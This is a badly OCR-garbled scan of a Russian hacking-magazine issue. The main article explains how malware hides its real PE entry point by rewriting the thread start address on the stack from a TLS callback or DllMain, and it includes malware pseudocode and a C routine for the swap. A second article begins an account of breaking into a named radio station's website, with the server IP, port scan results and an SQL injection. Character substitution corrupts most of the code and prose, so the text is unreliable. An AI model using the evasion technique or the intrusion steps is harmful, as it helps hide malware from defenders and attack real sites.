ЗА ПОДРОБНОЙ ИНФОРМАЦИЕЙ ОБРАЩАЙТЕСЬ К ОФИЦИАЛЬНЫМ ДИЛЕРАМ. 



ІМІ35АМ РІЫАІМСЕ 

специальная кредитная программа 



Подробности по телефону: 8 800 200 200 6 или у официальных дилеров. Компания ООО «Ниссан Мотор Рус» 
не предоставляет услуги по кредитованию. Услуги по кредитованию по программе ІМІ55АЫ РІЫАІМСЕ 
предоставляются ЗАО «ЮниКредит Банк» (генеральная лицензия ЦБ РФ №1). Программа 
Міззап Ріпапсе доступна во всех городах, где есть официальные дилеры. 



ІЧІ55АМ А55І5ТАМСЕ 
ПОМОЩЬ НА ДОРОГЕ 



1 Перечисленные опции входят не во все комплектации. 

2 В зависимости от наличия автомобилей у официальных дилеров. 

3 Первичная техническая помощь на дороге, эвакуация до ближайшего дилерского центра. 



НА ПРАВАХ РЕКЛАМЫ 







взлом 



КРИС КАСПЕРСКИІ 



МАЛ ВАРЬ 



ПОКОЛЕНИЯ 



Исследование совершенной заразы) 



|В сентябре 2008 датчики распределенных антивирусных сетей зафиксиро 

ніі : ннпвнан 



|вали неооычную активность — эпидемия малвари нового поколения начала 



^^ц^^^^нение пр^^^^^^^^^^^^менно с Индонезии, Вьетнама 



[и Таиланда, обходя антивирусные преграды на форсаже. Я это дело раск 



тил, написав пару РОС’ов, демонстрирующих технику сокрытия истинной 



точки входа в оайл. Это актуально не только для зловредных программ, но и 



;ля легальных протекторов 



стория началась еще несколько лет назад, когда я ковырял 
червей, обходивших персональные брандмауэры путем 
создания удаленного потока и вызывавших АРІ-вызов 
СгеабеКетоЬеТЬгеай. В качестве стартового адре- 
са ему передавался указатель на вредоносный код, впрыснутый в 
адресное пространство жертвы — например, выделением памя- 
ти на куче с последующим копированием зЬеІІ-кода АРІ-вызовом 



ИгібеРгосеззМетогу. Чтобы «выкупить»левые потоки, достаточно 
взглянуть на их стартовый адрес. У «нормальных» потоков он указывает 
в область страничного имиджа РЕ-файла, а у «рукотворных» — лежит в 
стеке, куче (или еще непонятно где]. 

Вот только ни Ргосевв Ехріогег Марка Руссиновича, ни дажеБоШСЕ 
не желали отображать истинные стартовые адреса «рукотворных» 
потоков. Высвечивали какой-то невменяемый адрес, ведущий в недра 
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Конференция АѴАР-2008, посвященная (анти) вирусным технологиям, 
на которой я собираюсь зачитать свой доклад о способах подмены точки 
входа в файл 



КЕЩЕІ32 .БЫ,, что, конечно, весьма подозрительно, но на веществен- 
ное доказательство не тянет. Поковырявшись в системном загрузчике, я 
выяснил, что подлинный стартовый адрес потока находится практичес- 
ки на самом дне стека. И если малварь не предпринимает дополнитель- 
ных способов маскировки, то «рукотворные» потоки обнаруживаются 
тривиальным сканером, который и был написан мной, что называется 
по горячим следам и послан Марку Руссиновичу вместе с баг-рапортом 
на Ргосевв Ехріогег. Поскольку никакой реакции так и не последовало, 
рапорт был обнародован на вполне респектабельной хакерской тусовке 
ОрепРСЕ.огд. Но и там он остался незамеченным. 

Годом позже, разгребая завалы своихзаметок, нацарапанных на клочках 
бумаги, я заинтересовался — на каком этапе загрузки файла стартовый 
адрес базового потока попадаете стеки можно л и его изменить изЛБ- 
саІІЬаск'а или функции ОІІтаіп статически прилинкованной ОП, Ока- 
залось, что стартовый адрес формируется до инициации ЛБ/ЭНглат, а 
после инициализации обращения коригинальной точке входа, пропи- 
санной в РЕ-за головке, уже не происходит. Система использует адрес, 
сохраненный в стеке, и этот адрес действительно может быть изменен. 
Отладчики (не говоря уже о дизассемблерах) ктакой «подлянке», разу- 
меется, не готовы и в своей массе просто теряют контроль над исполня- 
емым файлом! Я тут же написал сгаскте, выложил его на ОрепРСЕ, но 
хакерская общественность не оценила предложенныйтрюк по досто- 
инству. В результате чего я потерял кэтой затее всякий интерес... 

Тем временем, хакерская группировка (пожелавшая остаться втени, 
в смысле не оставившая в коде никаких инициалов) переоткрыла 
технологию измененияточки входа, использовав ее в малвари нового 
поколения. Статическими антивирусными сканерами она не обнару- 
живается в принципе! Как минимум, нужен полноценный эмулятор 
ЦП с качественным эмулятором окружения ѴѴІпсІоѵѵв, учитывающим 
недокументированные особенности системного загрузчика РЕ-файлов 
(а именно на них держится механизм подмены точки входа). 

Из всех существующих антивирусов малварь нового поколения сегодня 
могутобнаруживать только N0032, Р-5есиге, Бутапіес, КАѴ, Эг.ѴѴеЬ, да 
и то, лишь после усовершенствования эмулятора окружения ѴѴІпсІоѵѵв. 
Остальныетихо курятв сторонке. Неудивительно, что рассылка РОС'ов 
знакомым сотрудникам антивирусных компаний (Сбескроіпі, Бутапіес, 
Р-$есиге, К7Сотриііпд) вызывала конкретный резонанс, завершив- 
шийся посылом меня... нет, туда меня послали горячие парни из КАѴ'а. 
Ладно, это все шутки. А ситуация вполне серьезна. Уж не я ли спрово- 
цировал рождение малвари нового поколения? Нет и еще раз нет. Это 
совершенно независимая находка неизвестной хакерской группы (что 
элементарно доказывается анализом кода). Несмотря нато, что мой 



сгаскте и обозначенная малварь исповедуют идентичные концепции, 
детали реализации совершенно различны. Позиция стартового адреса 
потока в стеке непостоянна и варьируется даже в рамках отдельно 
взятой версии операционной системы. Это высадило меня на разработ- 
ку системно-независимого алгоритма, сканирующего стек на предмет 
поиска наиболее вероятных кандидатов на роль стартового адреса. В 
тоже самое время, пойманная малварь используетфиксированные 
локации и потому функционируеттолько под строго определенными 
версиями операционной системы. Логично, если бы хакерыувидели 
мой сгаскте, они бы непременно позаимствовали системно-незави- 
симый алгоритм, но этого не произошло. Значит, есть все основания 
предполагать, что это — продукт параллельных исследований, и я тут 
совсем не причем. 

В настоящее время компания Епбеаѵог Бесигііу, Іпс работает над 
армированием АМР (Асііѵе Маіѵѵаге Ргоіесііоп], присобачивая кней 
перехаченный х86ети вместе с эмулятором окружения ѴѴІпсІоѵѵв, 
«осведомленным» о недокументированных возможностях системного 
загрузчика РЕ-файлов. Так что АМР имеет все шансы оказаться первым 
коммерческим продуктом, способным распознавать малварь нового 
поколения и нетолько распознавать, но и блокировать. 

А проблема действительно встает в полный рост и чем дальше, тем 
выше. Какое-то время антивирусы не смогут обнаруживать малварь, 
изменяющую точку входа в РЕ-файл, и нам придется сражаться с ней 
вручную, а для этого нужно не только уверен но держать ША-Рго/НІЕѴѴ 
в руках, но и разбираться в недокументированныхтонкостях работы 
системного загрузчика. О них мы сейчас и поговорим. 

Н ТОЧКИ ВХОДА — ЖИВЫЕ И МЕРТВЫЕ 

Спецификация на РЕ-файл от Місговоіі описываетспециальное поле в 
РЕ-заголовке, хранящее относительный виртуальный адрес (РѴА) точки 
входа в файл, с которого как бы и начинается его выполнение. «Как бы», 
потому что точка входа (она же Епбгу Роіпі) выполняется не первой, а 
последней. 

До передачи управления на Епігу Роіпі система загружает все стати- 
чески прилинкованные динамические библиотеки, вызывая функции 
ОІІтаіп, исполняющиеся в контексте загрузившего их процесса и спо- 
собные воздействовать на него любым образом. ТЕБ-саІІЬаск’ и (да -да, 
те самые, о которых мы уже говорили в #5 «Эн циклоп един анти отладоч- 
ных приемов») также получают управление до выполнения точки входа, 
которой, вообще-то, может и не быть. В самом деле! Если ОИтат или 
ТІ_5-саІІЬаск «забудет» возвратить управление, точку входа вызывать 
станетуже некому и потому она можетуказывать на любой код! Но не 
будем забегать вперед. 

Рассмотрим классический алгоритм определения точки входа, взятый 
на вооружение многими антивирусами, отладчиками, дизассемблера- 
ми, определителями упаковщиков ит.д., ит.п. — устали перечислять. 

КЛАССИЧЕСКИЙ СПОСОБ 

ОПРЕДЕЛЕНИЯ ТОЧКИ ВХОДА В ФАЙЛ 



ЕсіеЕіпе РЕ_оЕЕ ОхЗС 
Есісііпе ЕР_оЕЕ 0x28 
оЕЕзеЕ 

ВУТЕ* СеЕЕР ( ) 

{ 

ІС ВУТЕ* 
зЕаЕіс ВѴ/ОВВ 
спав ЪиЕ 



//РЕ тадіс стогЭ гам оЕЕзеЕ 
// геІаЕіѵе ЕпЕгу РоіпЕ Еііесі 



Ьаз е_х , * ер_айг ; 
ре_оЕЕ , ер_оЕЕ; 

' МАХ РАТН1 ; 



// оЬЕаіп ехе Ьазе асИгезз 
СеЕМосіиІеЕіІеМате ( 0 , Ъ и Г , _МАХ_РАТН) ; 

Ъазе_х - (ВУТЕ*) СеЕМоеи 1 еНапсІ е (Ъи т ) ; 
ре_оЕЕ = * ( ( В В, 7 СВ В* ) (Ьазе_х + РЕ_оЕЕ) ) ; 
ер_оЕЕ = * { ( ВЕЮ к В* ) (Ъазе_х + ре_оЕЕ + ЕР_оЕЕ) ) 
ер_асг = Ъазе_х + ер_оЕЕ; // ВѴА Ео ѴА 
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► 069 




Адрес точки входа в файл, лежащий на дне стека базового потока 



ВЗЛОМ 



ВИ12РР0ІІ 
0В12ГГ&Й 
0012ГРВС 
0012РНЬ0 
В012ГГЕ*і 
ЙЙ12РРРЙ 
Ѳ012ГГЕС 
Ѳ012ГГР 0 
ЙЙ12ГРРІ1 


ешновноо 
001 2 г гее 
00000000 
РРРРРРРР 
79*101 Г54 
79*і32В1Ѳ 
00000000 
00000000 
00000000 


Епй оР 5ЕН спаіп 
Гіапйіѳг 

КЕВМР1 32-79432В1Й 


0012РРРВ 


Ѳ0409В50 


Ріеііо . ОІосіиІеЕпІігуРоі пё> 


Ѳ012РРРС 


00000000 





■ ер_а <3 г ; 

} 

Конечно, «промышленная» реализация функции веіЕРО выглядит чуть 
сложнее, поскольку осуществляет множество проверок, опущенных в 
листинге для простоты понимания. Но не в проверках дело, а в концеп- 
ции. Дырявой, естественно. 

Отладчики ставятсюда бряк, в надежде, что он сработает. Но он не 
сработает, если адресточки входа изменен. Стоп! Я опять устроил 
кавардак. Еще раз, медленно и по порядку. Когда отладчик порождает 
отладочный процесс и запускаетего на выполнение, то первым сраба- 
тывает бряк, засунутый системой в функцию ІЯТЩіЫ ОЬдВгеакРоіпб. 
Она сигнализирует о том, что отлаживаемый файл спроецирован в ад- 
ресное пространство и с ним можно работать как со своим собственным. 
В частности, считывать РЕ-за головок и устанавливать бряк на точку 
останова. Дело втом, что операционная система никак не информирует 
отладчик о передаче управления на точку входа и отслеживать этот 
процесс отладчик должен самостоятельно. 

пЬйІІ ! БЪдВгеакРоіпІ: : 

7769193с сс іігЬ 3 

Дизассемблеры никакихбряков не устанавливают, а просто тупо начи- 
нают дизассемблирование сточки входа. Что же касается антивирусов, 
то вообще-то тут действуют разные стратегии. Сигнатура может быть 
привязана не только к точке входа, но и к смещению относительно кон- 
ца/начала файла (или секции). В этом случае, изменениеточки входа 
никак не повлияет на умственные способности антивируса. Однако, 
прежде чем искать сигнатуру, файл необходимо распаковать, а в случае 
полиморфных вирусов — еще и прогнать их через эмулятор. И воттут-то 
без правильного определения точки входа не обойтись! 

Некоторые вирусы используют довольно хитрый трюк, совершая щтр 
изТІ_$-саІІЬаск'а,то есть, фактически, выполняя ТЕЗ-саЕЬаск без 
возврата управления. В результате чего оригинальная точка останова 
идет лесом и может содержать что угодно. Конечно, в разумных преде- 
лах. Наглеть не стоит. В частности, начиная сХР, системный загрузчик 
выполняет ряд проверок, и файлы сточкой останова, вылетающей за 
пределы страничного образа, просто не загружаются в память! Но даже 
если бы они и загружались, для антивируса такая точка останова выгля- 
дит слишком подозрительно и легколовится эвристическим анализато- 
ром. Какой смысл палить себя на мелочах? Лучшезасунутьвточку входа 
безобидный код, а изТІ_Б-саІІЬаск'а совершить переход на вирусное 
тело. В грубом приближении это выглядит так. 



ПСЕВДОКОД МАЛВАРИ СТАРОГО ПОКОЛЕНИЯ, ПЕРЕКРЫВАЮЩЕЙ 
ТОЧКУ ВХОДА В РЕ-ФАЙЛ ПОСРЕДСТВОМ БЛОКИРОВКИ ВОЗВРАТА 
УПРАВЛЕНИЯ ИЗТІ-5-САІ-І-ВАСК’А 

ЕпСгуРоіпі : 

ХОК ЕАХ, ЕАХ 
Р118Н ЕАХ 

САЬЪ й, йз : [ЕхііРгосезз] 

ѴігизВойу : 



ТЬ8_Са11Ьаскі : 

ЙМР ѴігизВойу 

На самом деле, антивирус, эмулирующий И$ (а проэмулироватьего 
несложно, благо, он уже давно документирован), разломает эту комби- 
нацию и даже не крякнет. Хотя на практике подавляющее большинство 
антивирусов либо вообще не знают о существовании ИЗ, либо эмули- 
руют их некорректно, что открывает большой простор для творческих 
махинаций по сокрытию зловредного кода в самых неожиданных 
местах. 

Атеперь посмотрим на псевдокод малвари нового поколения: 

ЕпСгуРоіпі: : 

ХОК ЕАХ, ЕАХ 
Р118Н ЕАХ 

САЬЬ й, йз : [ЕхііРгосезз] 

ѴігизВойу : 



ТЬ8_Са11Ъаск1 : 

АБО й, йз : [Е8Р+тадіс_об6зеЕ] , оібзеб ѴігизВойу 
— оббзеб ЕпЬгуРоіпС 
КЕТЫ ОСЬ 

На первый взгляд никакой разницы, но если подумать головой, то 
разница будет просто драматической. В первом случае мы имеем 
ничем не прикрытый бесстыдный щтр изТЕЗ-саІІЬаск'а. И хотя его 
можно замаскировать с помощью самомодифицирующегося кода или 
запутанных математических преобразований, целевой адрес перехода 



► 070 
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декодируется однозначно и указывает на вирусное тел о. 

Во втором случае ТІ_5-саІІЬаск добавляет какое-то зна- 
чение к некоторой ячейке памяти, лежащей в области 
стека, и возвращает управление системе. Человек с 
отладчиком чисто теоретически можеттрассировать 
тонны машинных инструкций, ответственных за ини- 
циализацию файла. Он может даже дождаться момента 
передачи управления на точку входа или хотя бы об- 
ласть памяти, не принадлежащую системе, а находящу- 
юся в границах РЕ-файла или одной из динамических 
библиотек. И тогда товарищ с удивлением обнаружит, 
что точка входа каким-то магическим образом не по- 
лучает управления! Вот только трассировать придется 
долго и непродуктивно. 

Антивирусам приходится еще хуже. Они не могут трассиро- 
вать код, исполняющийся на живой операционной системе 
(врядли стоит объяснять, почему]. Откуда им знать, что 
именно находится в данной конкретной ячейке памяти? А 
что, собственно говоря, там находится и как оно туда попа- 
дает? Попробуем разобраться! 

Н ТАЙНЫ СИСТЕМНОГО ЗАГРУЗЧИКА 

Существуют различные уровни недокументированности. 
Определенные свойства системы возникают в силу осо- 
бенностей реализации конкретно взятого билда. Содер- 
жимое стека на момент ста рта потока, значение регистров 
и флагов на моментвыхода из АРІ-функций — нетолько не 
документированы, но еще и варьируются в широких преде- 
лах. А потому в долгосрочной перспективе закладываться 
на них нельзя. 

Стартовый адрес потока представляетсобой редкое исклю- 
чение из правил. Он абсолютно недокументирован и в то же 
время неизбежно следует из документированных функций 
и особенностей работы системного загрузчика. Системный 
загрузчик в грубом приближении работаеттак: 

1 . Проецирует РЕ-файл в память . 

2 . Считывает РЕ-заголовок , извлекает оттуда 
значение точки останова , представляющее собой 
относительный виртуальный адрес (ПѴА) и пере- 
водит его в линейный адрес (ѴА) путем сложения 
с базовым адресом, также хранящимся в РЕ-за- 
головке . 

3 . ѴА-адрес точки входа передается функции 
СгеабеЕетобеТЧтгеаб { ) в качестве одного из 
аргументов. А передается он через стек, пос- 
кольку 32 -разрядные версии Міпбоѵтз используют 
БббсаІХ-соглашение для всех АРІ-функций без 
исключения ( 64-разрядные версии Ѵ/і псіоѵуз ис- 
пользуют -анГ-СЗ 1 1 -соглашение , передавая аргу- 
менты через регистры и стартовый адрес потока 
в стек не попадает} . 

4 . Стартовый адрес базового потока {указыва- 
ющий на точку входа) после прохождения всех 
проверок заталкивается в стек и больше к РЕ- 
заголовку система не обращается (это очень 
важный момент) . 

5 . СгеабеРешобеТЬгеаб ( ) выполняет инициализа- 
цию потока, в процессе которой отрабатывают- 
ся функции Г)1 1 ша і г. статически прилинкованных 
БШ, а также имеющиеся ТЬЗ-саІІЪаск'и (если 
они, конечно, есть) . 

6. На завершающем этапе инициализации РЕ-фай- 
ла, СгеабеРешобеТЕгеаб ( ) зовет недокументиро- 
ванную, не экспортируемую, сугубо внутреннюю 
функцию ВазеРгосезз ( ) , передавая ей стартовый 




Баг-рапорт 2006 года на Ргосевв Ехріогег Марка Руссиновича, где впервые был 
обозначен адресточки входа, хранящийся в стеке потока 



адрес потока , почерпнутый из стека в качестве 
аргумента . 

7 . ВазеРгосезз ( ) передает управление по ука- 
занному адресу. 

Какая интересная картина получается! Точка вхо- 
да представляет собой аргумент АР I- функции 
СгеабеКетобеТЬгеай (), имеющей документирован- 
ный прототип (МІСГ050ІТ его совершенно не собирается 
изменять). Причем, этотаргумент попадает на стек до 
отработки ОІІтаіп/ТЕЗ-саІІЬаск, а извлекается из стека 
послетого, какони возвратятуправление. Никакие 
проверки валидности стартового адреса потока не 
выполняются, а это значит, что ОИтаіп/ТЕЗ-саНЬаск 
могут изменять стартовый адрес потока по своему 
усмотрению. Собственно говоря, это справедливо для 
всех потоков, а не только для базового. Просто адрес 
базового потока прописан вточке входа в РЕ-файл, а 
адреса остальных потоков передаются как аргументы 
функции СгеаЬе [Кетобе] ТЬгеай ( ) . 

Другими словами, точка входа в файл попадаете стек не 
случайно, а согласно логике работы системного загрузчи- 
ка, которая справедлива для всей 32-разрядной линейки 
ЫТ-подобных систем и потому замечательно работает как 
на ѴѴ2К, таки на 5егѵег2008. Единственная проблема в том, 
что положение аргумента функции СгеаІеВетоІеТЬгеасШ 
системно-зависимо. Множество внутренних функций с 
недокументированными прототипами используют стек, 
складируя туда свои аргументы. Это, блин, затрудняет нашу 
задачу. 

Разработчики обозначенной малвари пошли по пути 
наименьшего сопротивления. Они просто протестировали 
несколько версий операционных систем, определив сме- 
щение стартового адреса базового потока относительно 
дна стека, после чего загнали их в одну таблицу. Попав на 
чужой компьютер, малварьопределяетверсиюоси, извле- 
кая соответствующее «магическое смещение» из сопутс- 
твующей таблицы. Это в том случае, если данная версия 
ѴѴІпбоѵѵв поддерживается малварью. Ну а если нет? 

Я пошел по другому пути. Менее надежному |и допуска- 
ющемуложные срабатывания), но зато намного более 
универсальному. Все просто! Считываем РЕ-заголовок, 
извлекаем оттуда подлинную точку входа и затем скани- 
руем стек на предмет поиска подходящих кандидатов. 
Естественно, точка входа может совпасть со значением, 




> ІПІ'о 



При определенных 
обстоятельствах сис- 
темный загрузчик на- 
гло игнорирует точку 
входа, прописанную 
в РЕ-файле. Потому 
она может указывать 
на безобидный код 
(типа немедленный 
ЕхіІРгосе55І, в то 
время какзловред- 
ный код расположен 
совсем в другом 
месте. Отладчики 
и дизассемблеры 
также обламываются, 
выдавая неверный 
результат. 
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Ч*' V Чі ЯЕ Сви[+! *Ѵ РгИЧѣНіОЧ! ОМІМКІ 



циих-сгаскте в моем файловом репрозитории на ОрепРСЕ (датированный 16 мая 
2008 года и основанный на подменеточки входа в файл из функции ОИтаіп статичес- 
ки прилинкованной динамической библиотеки] 



ВазеАсИгезз = ( (ВУТЕ* ) ІрВиііег . ВазеАсМгезз) ; 
ЕедіопЗіге = ІрВиііег .ЕедіопЗіге - зігеоі (БШЕБ) ; 



ЕР із КЕЕЫЕБ32 ! СгеаіеЕетоіеТЪгеасІ ( ) іипсііоп агдитепі , 
апсі ііііз агдитепі із пеаг іо іЬ.е Ъоііот о і. іЬ.е зіаск 




> Ііпкз 

• орепгсе.огд/ 
1огит5/ров1в/275 

— открытое письмо 
Марку Руссиновичу, 
в котором я впер- 
вые высказал идею 
довольно надежного 
способа детекции 
малвари. 

• орепгсе.огд/ 
геровііогіев/ 
цвегв/пегиті/ 
диих-сгаскте.гір 

— сгаскте, демонс- 
трирующий технику 
подмены точки входа 
в файл посредством 
изменения стартово- 
го адреса потока. 

• ааѵаг.огд/ 

аѵа г2008/іпбех.Ыт 

— офицальный сайт 
конференции АѴАР- 
2008, на которой я 
планирую выступить 
с сабжевым докла- 
дом. 



хранящимся в стеке, ноне имеющем кней никакого 
отношения. Подобная ситуация называется «коллизией» 
и ничего хорошего в себе не несет. Нет никакой возмож- 
ности определить, какое именно значение следует изме- 
нить, а какое — лучше не трогать. Тем не менее, я решил 
изменять все значения, совпадающие сточкой входа, ну, 
а чтобы уменьшить количество ложных срабатываний, 
выбирать точку входа, хранящуюся в РЕ-файле так, чтобы 
она была ни на что не похожа. То есть, представляла 
собой уникальное значение, не совпадающее ни с одним 
из прочих полей РЕ-файла. 

Ниже приводится законченный алгоритм подмены точ- 
ки входа из 0итаіп/ТІ_8-саІІЬаск, протестированный на 
всем спектре ѴѴІп б оѵѵз- систем и показавший хороший 
результат. 

ПОДМЕНА ТОЧКИ ВХОДА В ФАЙЛ 
ИЗ ФУНКЦИИ ОЫ-МАШ СТАТИЧЕСКИ 
ПРИЛИНКОВАННОЙ ОСЕ 

// петс ЕР (ЗузЬешЬоайег ' 11 ідпоге іЬе оісі опе) 

#йеііпе ЫЕМ_ЕР 0х0040100А 

// зітріе іттесііаіе сопзіапі оЪіизсаііоп. . . 

Меііпе ЕР_КЕУ 0хА11СЕ1б9 
// . . . апіі ІОА Рго ігіск 
ипзідпей ІШ: ЕР_кеу = ЕР_КЕУ; 

ВООЬ ИШАРІ с!11шаіп( 

НШЗТАЫСЕ ЬіпзіБББ, 

БШЕБ іймКеазоп, 

ЬРѴОІБ ІрѵЕезегѵей) 

{ 

ВУТЕ* ер_а<іг; 

БШЕБ ЕедіопЗіге; 

ВУТЕ* ВазеАсМгезз; 

МЕМОЕУ_ВАЗІС_ІЫЕОЕМАТІ(Ж ІрВиііег; 
ер_айг = ОеіЕР ( ) ; 

// деі зіаск іор аііосаіеб. Ьазе асійгезз 
ѴігіиаІОиегу ( (ЬРСѴОІБ) &ЫпзЬБЬЬ, &1рВиііег, 
зігеоі (ІрВиііег) ) ; 



іог(; ЕедіопЗіге > 0; ЕедіопЗіге -= зігеоі (БШЕБ) ) 
іі ( ( (БШЕБ) ер_ас!г ) == ( * (БШЕБ*) (ВазеАсМгезз + 

ЕедіопЗіге) ) ) 

(* (БШЕБ*) (ВазеАйсігезз + ЕедіопЗіге) ) = 

ЫЕИ_ЕР л ЕР_КЕУ , 

(*(БШЕБ*) (ВазеАсійгезз + ЕедіопЗіге) ) л = ЕР_кеу; 
геіигп 1; 

> 

г ОХОТНИКИ ЗА ПРИВИДЕНИЯМИ 

Сложность эмуляции работы системного загрузчика 
связана с «плавающим» смещением точки входа. Даже 
если антивирус и положит ее в стек, то у него нет никаких 
гарантий, что вирус ее там найдет, а не попытается изме- 
нить соседнюю ячейку. Антивирус не знает, какую версию 
операционной системы «поддерживает» анализируемый 
вирус и каким образом он ее определяет. Помимотупого 
вызова ВеіѴегвіопЕх, вирус может обратиться к реестру или 
посчитать контрольную сумму определенных системных 
библиотек. Короче, возможных вариантов намного больше 
одного! 

Конечно, мой код (в «канонической» форме) легко попадет- 
ся на ловушки, расставленные антивирусами, поскольку 
даже не пытается отличить подлинный стартовый адрес 
потока, засунутый в стек системой, от его имитации анти- 
вирусом. Но, во-первых, антивирусы ничего об этом трюке 
пока не знают, а, во-вторых, я преследовал совсем иные 
цели, и код замечательно работает в защитных механизмах 
в силу того, что совместим со всеми системами, а не только 
со строго определенными версиями. 

Н РЕАЛЬНАЯ БОМБА 

Малварь, изменяющая точку входа, только-только 
начинает появляться и предсказать пути ее дальней- 
шего развития весьма затруднительно. Пока ясно одно 
— это бомба, реальная бомба. Первый серьезный вызов 
антивирусам за последние несколько лет! Интересно 
наблюдатьза реакцией их разработчиков, варьирую- 
щейся от ужаса до тупого непонимания проблемы. Что ж, 
если технология получит развитие, то кое-кто очень скоро 
вылетит с рынка. НС 
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Реклама 




ПАРЕНЬ С ОГОНЬКОМ ДОМИНО 



ШЕРИФ 




А ВАМ ПОДХОДИТ 
ОЮ 5РІСЕ ГЕЛЬ + ШАМПУНЬ? 

КОНЕЧНО! КАК БЫ И ГДЕ БЫ НИ РОСЛИ У ВАС ВОЛОСЫ, ОБО 5РІСЕ ГЕЛЬ + ШАМПУНЬ, НЕСОМНЕННО, ВАМ ПОДХОДИТ! 




КОРОЛЬДИСКО МИНИ-БИКИНИ 




КОЛЮЧКА 




СТРАЖНИК 





НЕАНДЕРТАЛЕЦ 




ОСТРОВИТЯНИН 



ГЬПЬ+ 

щн ЛІЯ* 

№ ^ і 



ОБО 5РІСЕ ГЕЛЬ + ШАМПУНЬ. 
ДЛЯ ТЕЛА. ИЛИ ДЛЯ ВОЛОС. 
ИЛИ ДЛЯ ТОГО И ДРУГОГО. 





ЛЕОНИД «ВОЮ» ОТРОЙКОВ 



ПО-ХАКЕРСКИ 



взлом 



ЛОМАЕМ РАДИО «ЮМОР РМ» 



Пожалуй, в жизни каждого быв ают моменты, когда хочется расслабиться 

Чіли просто отдохнуть от повседневной рутины. В такой ситуации кто-то на 
И I , Г 

скорую р^ку вешает дефейс на сайте приглянувшегося ему хостинга, а кто- 
-то долго и мучительно флудит телефоны недругов забавными зтз’ками. Я 

^ Ш 

же решил просто послушать радио. Что из этого получилось — читай ниже. 

I „ 



г шутки ради 

Одним осенним вечером, когда прохлада и слякоть за окном отбивали 
всякое желание выбраться на прогулку, я решил пропарсить в Сети 
несколько радиостанций на предметхорошей музыки. Перебирая одно 
«радио» за другим, я вдруг наткнулся на любимую многими радиостан- 
цию «Юмор РМ» [ Диджеям сего радио респект , — Прим, автора]. 
После нескольких прикольных историй, услышанных в эфире, в моей го- 
лове родиласьочередная безумная идея, вследствие которой вещание 
радиостанции уже перестало меня интересовать. 

В окне браузера замелькал Гугл с заголовкам и «Юмор РМ». Моему взору 
предстали десятки разнообразных доменов, состоящих из комбинаций 
слов «битог»/«уитог» и «Іт», но среди прочих выделялся красивый 
и явно не дешевый домен ѵѵѵѵѵѵ.Ьитогіт . Каки ожидалось, л инк вел 
на официальный сайт радиостанции «Юмор РМ». Первым делом я по 
привычке воспользовался сервисом 

который выдал следующую информацию по домену ѵѵѵѵѵѵ. би тогіт : 



ІР: 77.120.97.62 
ТИЦ: 30 
РК: 3 



21-ТСР порт - РТР 
25-ТСР порт - 8МТР 
53-ТСР порт - БЧЗ 
80-ТСР порт - НТТР 
110-ТСР порт - РОРЗ 

Увы, но дополнительное сканирование на наличие открытых для чтения 
каталогов (сучетом неправильно выставленныхчмодов] результатов не 
дало. Также, каки не была найдена админка или хоть какое-то подобие 
администраторской панели. После недолгого ковыряния движка, сопро- 
вождавшегося изредка встречающимися пассивными ХЗБ’ками, была 
успешно опробована формочка восстановления пароля, располагавшая- 
ся по адресу: біббрз : / /біишог . бт/Рогдеб/Ло . 4 . 

Стоитли говорить, что в полях «Логин» и «Е-таіІ» напрочь отсутствова- 
ла какая-либо фильтрация. Налицо — врі-инъекция, правда, полноцен- 
но использовать ее можно был о только при помощи Р05Т-запросов. 
Погуляв по сайту еще некоторое время, я обнаружил достаточно удобную 
вці-инъекцию в параметре сообщения об ошибке в скриптелогина. 
Причем, бага была явной, — всю ругань СУБД на неправильно сконстру- 
ированный запрос я мог отчетливо наблюдать на своем мониторе: 



Кроме того, на сервере хостилось несколько десятков ресурсов, которые, 
впрочем, трогать раньше времени не хотелось. Удаленно просканировав 
сервер, я получил примерный расклад по открытым портам и запущен- 
ным службам, среди которых значились: 



БЕВЧе МСЮЕ 

ЗОЬ Еггог 1064 : Уои біаѵе ап еггог іп уоиг ЗОБ зупбах; 
сЬеск ббіе тапиаі Г. паб соггезропйз бо уоиг КуЗСТ. зегѵег 
ѵегзіоп Рог бРе гідбіб зупбах Со изе пеаг ’ 1 ІЩБ іс!_1пд 
= ’ 1 ’ 1 а б Ііпе 1 
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